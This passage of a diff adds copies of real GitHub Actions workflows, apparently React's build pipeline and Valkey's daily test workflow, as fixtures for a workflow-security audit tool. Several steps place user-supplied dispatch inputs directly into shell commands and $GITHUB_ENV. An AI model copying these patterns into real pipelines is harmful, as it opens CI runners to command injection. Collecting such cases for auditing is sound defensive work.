21, 22, 23, 24] + release_channel: [stable, experimental] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - uses: actions/setup-java@v4 + with: + distribution: temurin + java-version: 11.0.22 + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn build --index=${{ matrix.worker_id }} --total=25 --r=${{ matrix.release_channel }} --ci + env: + CI: github + RELEASE_CHANNEL: ${{ matrix.release_channel }} + NODE_INDEX: ${{ matrix.worker_id }} + - name: Lint build + run: yarn lint-build + - name: Display structure of build + run: ls -R build + - name: Archive build + uses: actions/upload-artifact@v4 + with: + name: _build_${{ matrix.worker_id }}_${{ matrix.release_channel }} + path: build + if-no-files-found: error + + test_build: + name: yarn test-build + needs: [build_and_lint, runtime_compiler_node_modules_cache] + strategy: + fail-fast: false + matrix: + test_params: [ + # Intentionally passing these as strings instead of creating a + # separate parameter per CLI argument, since it's easier to + # control/see which combinations we want to run. + -r=stable --env=development, + -r=stable --env=production, + -r=experimental --env=development, + -r=experimental --env=production, + # TODO: Update test config to support www build tests + # - "-r=www-classic --env=development --variant=false" + # - "-r=www-classic --env=production --variant=false" + # - "-r=www-classic --env=development --variant=true" + # - "-r=www-classic --env=production --variant=true" + # - "-r=www-modern --env=development --variant=false" + # - "-r=www-modern --env=production --variant=false" + # - "-r=www-modern --env=development --variant=true" + # - "-r=www-modern --env=production --variant=true" + + # TODO: Update test config to support xplat build tests + # - "-r=xplat --env=development --variant=false" + # - "-r=xplat --env=development --variant=true" + # - "-r=xplat --env=production --variant=false" + # - "-r=xplat --env=production --variant=true" + + # TODO: Test more persistent configurations? + ] + shard: + - 1/10 + - 2/10 + - 3/10 + - 4/10 + - 5/10 + - 6/10 + - 7/10 + - 8/10 + - 9/10 + - 10/10 + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: node --version + - run: yarn test --build ${{ matrix.test_params }} --shard=${{ matrix.shard }} --ci + + test_build_devtools: + name: yarn test-build (devtools) + needs: [build_and_lint, runtime_node_modules_cache] + strategy: + fail-fast: false + matrix: + shard: + - 1/5 + - 2/5 + - 3/5 + - 4/5 + - 5/5 + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: node --version + - run: yarn test --build --project=devtools -r=experimental --shard=${{ matrix.shard }} --ci + + process_artifacts_combined: + name: Process artifacts combined + needs: [build_and_lint, runtime_node_modules_cache] + permissions: + # https://github.com/actions/attest-build-provenance + id-token: write + attestations: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: echo ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} >> build/COMMIT_SHA + - name: Scrape warning messages + run: | + mkdir -p ./build/__test_utils__ + node ./scripts/print-warnings/print-warnings.js > build/__test_utils__/ReactAllWarnings.js + # Compress build directory into a single tarball for easy download + - run: tar -zcvf ./build.tgz ./build + # TODO: Migrate scripts to use `build` directory instead of `build2` + - run: cp ./build.tgz ./build2.tgz + - name: Archive build artifacts + id: upload_artifacts_combined + uses: actions/upload-artifact@v4 + with: + name: artifacts_combined + path: | + ./build.tgz + ./build2.tgz + if-no-files-found: error + - uses: actions/attest-build-provenance@v2 + # We don't verify builds generated from pull requests not originating from facebook/react. + # However, if the PR lands, the run on `main` will generate the attestation which can then + # be used to download a build via scripts/release/download-experimental-build.js. + # + # Note that this means that scripts/release/download-experimental-build.js must be run with + # --no-verify when downloading a build from a fork. + if: github.event_name == 'push' && github.ref_name == 'main' || github.event.pull_request.head.repo.full_name == github.repository + with: + subject-name: artifacts_combined.zip + subject-digest: sha256:${{ steps.upload_artifacts_combined.outputs.artifact-digest }} + + check_error_codes: + name: Search build artifacts for unminified errors + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Search build artifacts for unminified errors + run: | + yarn extract-errors + git diff --exit-code || (echo "Found unminified errors. Either update the error codes map or disable error minification for the affected build, if appropriate." && false) + + check_release_dependencies: + name: Check release dependencies + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - run: yarn check-release-dependencies + + RELEASE_CHANNEL_stable_yarn_test_dom_fixtures: + name: Check fixtures DOM (stable) + needs: build_and_lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: fixtures_dom-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'fixtures/dom/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn --cwd fixtures/dom install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Run DOM fixture tests + run: | + yarn predev + yarn test + working-directory: fixtures/dom + env: + RELEASE_CHANNEL: stable + + # ----- FLIGHT ----- + run_fixtures_flight_tests: + name: Run fixtures Flight tests + needs: build_and_lint + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + # Fixture copies some built packages from the workroot after install. + # That means dependencies of the built packages are not installed. + # We need to install dependencies of the workroot to fulfill all dependency constraints + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: fixtures_flight-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'fixtures/flight/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd fixtures/flight install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Check Playwright version + id: playwright_version + run: echo "playwright_version=$(npm ls @playwright/test | grep @playwright | sed 's/.*@//' | head -1)" >> "$GITHUB_OUTPUT" + - name: Cache Playwright Browsers for version ${{ steps.playwright_version.outputs.playwright_version }} + id: cache_playwright_browsers + uses: actions/cache@v4 + with: + path: ~/.cache/ms-playwright + key: playwright-browsers-v6-${{ runner.arch }}-${{ runner.os }}-${{ steps.playwright_version.outputs.playwright_version }} + - name: Playwright install deps + if: steps.cache_playwright_browsers.outputs.cache-hit != 'true' + working-directory: fixtures/flight + run: npx playwright install --with-deps chromium + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Display structure of build + run: ls -R build + - name: Run tests + working-directory: fixtures/flight + run: yarn test + env: + # Otherwise the webserver is a blackbox + DEBUG: pw:webserver + - name: Archive Flight fixture artifacts + uses: actions/upload-artifact@v4 + with: + name: flight-playwright-report + path: fixtures/flight/playwright-report + if-no-files-found: warn + - name: Archive Flight fixture artifacts + uses: actions/upload-artifact@v4 + with: + name: flight-test-results + path: fixtures/flight/test-results + if-no-files-found: ignore + + # ----- DEVTOOLS ----- + build_devtools_and_process_artifacts: + name: Build DevTools and process artifacts + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + browser: [chrome, firefox, edge] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - run: ./scripts/ci/pack_and_store_devtools_artifacts.sh ${{ matrix.browser }} + env: + RELEASE_CHANNEL: experimental + - name: Display structure of build + run: ls -R build + # Simplifies getting the extension for local testing + - name: Archive ${{ matrix.browser }} extension + uses: actions/upload-artifact@v4 + with: + name: react-devtools-${{ matrix.browser }}-extension + path: build/devtools/${{ matrix.browser }}-extension.zip + if-no-files-found: error + - name: Archive ${{ matrix.browser }} metadata + uses: actions/upload-artifact@v4 + with: + name: react-devtools-${{ matrix.browser }}-metadata + path: build/devtools/webpack-stats.*.json + + merge_devtools_artifacts: + name: Merge DevTools artifacts + needs: build_devtools_and_process_artifacts + runs-on: ubuntu-latest + steps: + - name: Merge artifacts + uses: actions/upload-artifact/merge@v4 + with: + name: react-devtools + pattern: react-devtools-* + + run_devtools_e2e_tests: + name: Run DevTools e2e tests + needs: [build_and_lint, runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Restore archived build + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Check Playwright version + id: playwright_version + run: echo "playwright_version=$(npm ls @playwright/test | grep @playwright | sed 's/.*@//' | head -1)" >> "$GITHUB_OUTPUT" + - name: Cache Playwright Browsers for version ${{ steps.playwright_version.outputs.playwright_version }} + id: cache_playwright_browsers + uses: actions/cache@v4 + with: + path: ~/.cache/ms-playwright + key: playwright-browsers-v6-${{ runner.arch }}-${{ runner.os }}-${{ steps.playwright_version.outputs.playwright_version }} + - name: Playwright install deps + if: steps.cache_playwright_browsers.outputs.cache-hit != 'true' + run: npx playwright install --with-deps chromium + - run: ./scripts/ci/run_devtools_e2e_tests.js + env: + RELEASE_CHANNEL: experimental + - name: Archive Playwright report + uses: actions/upload-artifact@v4 + with: + name: devtools-playwright-artifacts + path: tmp/playwright-artifacts + if-no-files-found: warn + + # ----- SIZEBOT ----- + sizebot: + if: ${{ github.event_name == 'pull_request' && github.ref_name != 'main' && github.event.pull_request.base.ref == 'main' }} + name: Run sizebot + needs: [build_and_lint] + permissions: + # We use github.token to download the build artifact from a previous runtime_build_and_test.yml run + actions: read + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache@v4 # note: this does not reuse centralized cache since it has unique cache key + id: node_modules + with: + path: | + **/node_modules + key: runtime-release-node_modules-v6-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'scripts/release/yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd scripts/release install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Download artifacts for base revision + # The build could have been generated from a fork, so we must download the build without + # any verification. This is safe since we only use this for sizebot calculation and the + # unverified artifact is not used. Additionally this workflow runs in the pull_request + # trigger so only restricted permissions are available. + run: | + GH_TOKEN=${{ github.token }} scripts/release/download-experimental-build.js --commit=$(git rev-parse ${{ github.event.pull_request.base.sha }}) ${{ (github.event.pull_request.head.repo.full_name != github.repository && '--noVerify') || ''}} + mv ./build ./base-build + - name: Delete extraneous files + # TODO: The `download-experimental-build` script copies the npm + # packages into the `node_modules` directory. This is a historical + # quirk of how the release script works. Let's pretend they + # don't exist. + run: rm -rf ./base-build/node_modules + - name: Display structure of base-build from origin/main + run: ls -R base-build + - name: Ensure clean build directory + run: rm -rf build + - name: Restore archived build for PR + uses: actions/download-artifact@v4 + with: + pattern: _build_* + path: build + merge-multiple: true + - name: Scrape warning messages + run: | + mkdir -p ./build/__test_utils__ + node ./scripts/print-warnings/print-warnings.js > build/__test_utils__/ReactAllWarnings.js + - name: Display structure of build for PR + run: ls -R build + - run: echo ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} >> build/COMMIT_SHA + - run: node ./scripts/tasks/danger + - name: Archive sizebot results + uses: actions/upload-artifact@v4 + with: + name: sizebot-message + path: sizebot-message.md + if-no-files-found: ignore diff --git a/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml b/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml new file mode 100644 index 0000000..70e0cc2 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-07-workflow-call-boundary/.github/workflows/daily.yml @@ -0,0 +1,1984 @@ +name: Daily +on: + pull_request: + types: [opened, synchronize, reopened, labeled] + branches: + # any PR to a release branch. + - "[0-9].[0-9]" + - "unstable" + paths-ignore: + - "**/*.md" + - "**/00-RELEASENOTES" + - "**/COPYING" + schedule: + - cron: "0 0 * * *" + workflow_dispatch: + inputs: + skipjobs: + description: "jobs to skip (delete the ones you wanna keep, do not leave empty)" + default: "valgrind,sanitizer,tls,freebsd,macos,alpine,32bit,iothreads,ubuntu,rpm-distros,malloc,specific,fortify,reply-schema,arm,lttng" + skiptests: + description: "tests to skip (delete the ones you wanna keep, do not leave empty)" + default: "valkey,modules,sentinel,cluster,unittest,large-memory" + test_args: + description: "extra test arguments" + default: "" + cluster_test_args: + description: "extra cluster / sentinel test arguments" + default: "" + use_repo: + description: "repo owner and name" + default: "valkey-io/valkey" + use_git_ref: + description: "git branch or sha to use" + default: "unstable" + workflow_call: + inputs: + skipjobs: + description: "jobs to skip (delete the ones you wanna keep, do not leave empty)" + required: false + type: string + default: "" + skiptests: + description: "tests to skip (delete the ones you wanna keep, do not leave empty)" + required: false + type: string + default: "" + test_args: + description: "extra test arguments" + required: false + type: string + default: "" + cluster_test_args: + description: "extra cluster / sentinel test arguments" + required: false + type: string + default: "" + use_repo: + description: "repo owner and name" + required: false + type: string + default: "valkey-io/valkey" + use_git_ref: + description: "git branch or sha to use" + required: false + type: string + default: "unstable" +concurrency: + group: daily-${{ github.head_ref || inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + cancel-in-progress: ${{ github.event_name != 'pull_request' || github.event.action != 'labeled' }} +permissions: + contents: read + pull-requests: read +jobs: + test-ubuntu-jemalloc: + runs-on: ubuntu-latest + # pull_request gate breakdown: + # 1) (base != unstable) OR PR currently has run-extra-tests. + # 2) Exclude all labeled events, except unstable + newly added run-extra-tests. + # 3) release branches run on opened/reopened/synchronize, never label-only events. + # 4) unstable runs when run-extra-tests is added, and on later code updates while it remains. + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'ubuntu') + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + - name: install Redis OSS 6.2 server for compatibility testing + run: | + cd tests/tmp + wget https://download.redis.io/releases/redis-6.2.14.tar.gz + tar -xvf redis-6.2.14.tar.gz + - name: make Redis OSS 6.2 server + run: | + cd tests/tmp/redis-6.2.14 + make + - name: backward compatibility tests with OSS Redis 6.2 + run: | + sudo apt-get install tcl8.6 tclx + ./runtest --verbose --tags compatible-redis --dump-logs --other-server-path tests/tmp/redis-6.2.14/src/redis-server + - name: install Redis OSS 7.0 server for compatibility testing + run: | + cd tests/tmp + wget https://download.redis.io/releases/redis-7.0.15.tar.gz + tar -xvf redis-7.0.15.tar.gz + - name: make Redis OSS 7.0 server + run: | + cd tests/tmp/redis-7.0.15 + make + - name: backward compatibility tests with OSS Redis 7.0 + run: | + sudo apt-get install tcl8.6 tclx + ./runtest --verbose --tags compatible-redis --dump-logs --other-server-path tests/tmp/redis-7.0.15/src/redis-server + test-ubuntu-arm: + runs-on: ubuntu-24.04-arm + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + (!contains(github.event.inputs.skipjobs, 'ubuntu') || !contains(github.event.inputs.skipjobs, 'arm')) + timeout-minutes: 14400 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - run: cd libbacktrace && ./configure && make && sudo make install + - name: Install gtest + run: sudo apt-get install pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests SERVER_CFLAGS='-Werror' USE_LIBBACKTRACE=yes + - name: testprep + run: sudo apt-get install tcl8.6 tclx + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + elif [ -f ./src/valkey-unit-tests ]; then + ./src/valkey-unit-tests --accurate + fi + test-ubuntu-jemalloc-fortify: + runs-on: ubuntu-latest + if: | + (github.event_name == 'workflow_call' || github.event_name == 'workflow_dispatch' || + (github.event_name == 'schedule' && github.repository == 'valkey-io/valkey') || + (github.event_name == 'pull_request' && + (github.event.pull_request.base.ref != 'unstable' || + contains(github.event.pull_request.labels.*.name, 'run-extra-tests')) && + (github.event.action != 'labeled' || + (github.event.pull_request.base.ref == 'unstable' && github.event.label.name == 'run-extra-tests')) + )) && + !contains(github.event.inputs.skipjobs, 'fortify') + container: ubuntu:plucky + timeout-minutes: 1440 + steps: + - name: prep + if: github.event_name == 'workflow_dispatch' || github.event_name == 'workflow_call' + run: | + echo "GITHUB_REPOSITORY=${{inputs.use_repo || github.event.inputs.use_repo}}" >> $GITHUB_ENV + echo "GITHUB_HEAD_REF=${{inputs.use_git_ref || github.event.inputs.use_git_ref}}" >> $GITHUB_ENV + echo "skipjobs: ${{github.event.inputs.skipjobs}}" + echo "skiptests: ${{github.event.inputs.skiptests}}" + echo "test_args: ${{github.event.inputs.test_args}}" + echo "cluster_test_args: ${{github.event.inputs.cluster_test_args}}" + - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ${{ inputs.use_repo || github.event.inputs.use_repo || github.repository }} + ref: ${{ inputs.use_git_ref || github.event.inputs.use_git_ref || github.ref }} + - name: Install libbacktrace + uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2 + with: + repository: ianlancetaylor/libbacktrace + ref: b9e40069c0b47a722286b94eb5231f7f05c08713 + path: libbacktrace + - name: Build libbacktrace + run: | + apt-get update && apt-get install -y make gcc-13 git cmake g++ python3 + update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-13 100 + cd libbacktrace && ./configure && make && make install + - name: Install gtest + run: apt-get install -y pkg-config libgtest-dev libgmock-dev + - name: make + run: make all-with-unit-tests CC=gcc OPT=-O3 SERVER_CFLAGS='-Werror -U_FORTIFY_SOURCE -D_FORTIFY_SOURCE=3' USE_LIBBACKTRACE=yes + - name: testprep + run: apt-get install -y tcl8.6 tclx procps + - name: test + if: true && !contains(github.event.inputs.skiptests, 'valkey') + run: ./runtest ${{ github.event_name != 'pull_request' && '--accurate' || '' }} --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: module api test + if: true && !contains(github.event.inputs.skiptests, 'modules') + run: CFLAGS='-Werror' ./runtest-moduleapi --verbose --dump-logs ${{github.event.inputs.test_args}} + - name: sentinel tests + if: true && !contains(github.event.inputs.skiptests, 'sentinel') + run: ./runtest-sentinel ${{github.event.inputs.cluster_test_args}} + - name: cluster tests + if: true && !contains(github.event.inputs.skiptests, 'cluster') + run: ./runtest-cluster ${{github.event.inputs.cluster_test_args}} + - name: unittest + if: true && !contains(github.event.inputs.skiptests, 'unittest') + run: | + if [ -f ./src/unit/valkey-unit-gtests ]; then + make test-unit accurate=1 + 